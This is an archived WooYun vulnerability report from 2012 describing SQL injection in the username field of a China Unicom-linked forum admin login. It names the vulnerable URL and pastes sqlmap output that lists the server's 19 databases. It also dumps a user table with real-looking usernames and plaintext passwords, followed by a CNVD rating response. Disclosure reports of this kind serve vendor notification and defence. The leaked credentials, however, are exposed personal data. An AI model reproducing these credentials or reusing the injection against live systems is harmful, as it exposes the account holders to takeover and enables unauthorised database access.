当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014714

漏洞标题:联通某论坛Sql注射,明文密码,顿时凌乱

相关厂商:联通总部

漏洞作者: SbbS

提交时间:2012-11-13 12:57

修复时间:2012-12-28 12:58

公开时间:2012-12-28 12:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-13: 细节已通知厂商并且等待厂商处理中
2012-11-14: 厂商已经确认,细节仅向厂商公开
2012-11-24: 细节向核心白帽子及相关领域专家公开
2012-12-04: 细节向普通白帽子公开
2012-12-14: 细节向实习白帽子公开
2012-12-28: 细节向公众公开

简要描述:

联通某论坛Sql注射,明文密码,顿时凌乱

详细说明:

http://wlan.bbn.com.cn:8089/n_wlan/admin/login.php?action=login
POST时用户名可以注射。

there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[09:51:22] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Microsoft SQL Server 2005
[09:51:22] [INFO] fetching database names
[09:51:22] [INFO] the SQL query used returns 19 entries
[09:51:22] [INFO] starting 10 threads
[09:51:22] [INFO] resumed: "BBNEduBlog"
[09:51:22] [INFO] resumed: "BBNEduDev"
[09:51:22] [INFO] resumed: "BBNEduGK"
[09:51:22] [INFO] resumed: "BBNEduSearch"
[09:51:22] [INFO] resumed: "EduShop"
[09:51:22] [INFO] resumed: "kaoshi"
[09:51:22] [INFO] resumed: "model"
[09:51:22] [INFO] resumed: "luck"
[09:51:22] [INFO] resumed: "school"
[09:51:22] [INFO] resumed: "schoold"
[09:51:22] [INFO] resumed: "tempdb"
[09:51:22] [INFO] resumed: "TRSWCMV65"
[09:51:22] [INFO] resumed: "WebBlog"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_edu"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_edu_bbs"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_kaoshi"
[09:51:22] [INFO] resumed: "msdb"
[09:51:22] [INFO] resumed: "QuestSoftware"
[09:51:22] [INFO] resumed: "master"
available databases [19]:
[*] BBNEduBlog
[*] BBNEduDev
[*] BBNEduGK
[*] BBNEduSearch
[*] EduShop
[*] kaoshi
[*] luck
[*] master
[*] model
[*] msdb
[*] QuestSoftware
[*] school
[*] schoold
[*] tempdb
[*] TRSWCMV65
[*] WebBlog
[*] www_bbn_com_cn_edu
[*] www_bbn_com_cn_edu_bbs
[*] www_bbn_com_cn_kaoshi


跨站后台什么的就不想发了,我只是喜欢注入,我是一个小白

Database: luck                                                                                                                                                                                  
Table: dbo.tb1_user
[100 entries]
+------+------------+--------------+
| u_id | u_password | u_username |
+------+------------+--------------+
| 1 | qiegai | beilu3197 |
| 10 | gangzi | pupu320 |
| 100 | tanyou20 | xinji97258 |
| 1000 | gushan | youzhi118179 |
| 1001 | guailia | zalie3503 |
| 1002 | paza748 | jieyou |
| 1003 | qiunao58 | huangjie6134 |
| 1004 | xixian | haiji43944 |
| 1005 | feishi1 | menglian6 |
| 1006 | touyou | xianjia1 |
| 1007 | namei98 | chuibi6013 |
| 1008 | jique2 | anxian996 |
| 1009 | zhanglu | zhiping8 |
| 101 | beina22 | tanhan13 |

漏洞证明:

1.png


2.png

修复方案:

不知道你们是觉得自己牛逼还怎么了,居然明文存储密码,但是你们没牛逼成功,已经有人进去了,不知道你们的攻城尸是做啥子的,坐月子吗?

版权声明:转载请注明来源 SbbS@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2012-11-14 15:37

厂商回复:

CNVD确认漏洞情况,但未实时复现(登陆表单已经不存在,refer以及URL不好找,无法用SQLMAP复现)。转由CNCERT直接通报中国联通集团公司处置。
按完全影响机密性进行评分(是否可SQL Server提权未知),基本危害评分7.79,发现技术难度系数1.1,涉及行业或单位影响系数1.4(有可能涉及宽带用户信息),综合rank=7.79*1.0*1.4=10.906

最新状态:

暂无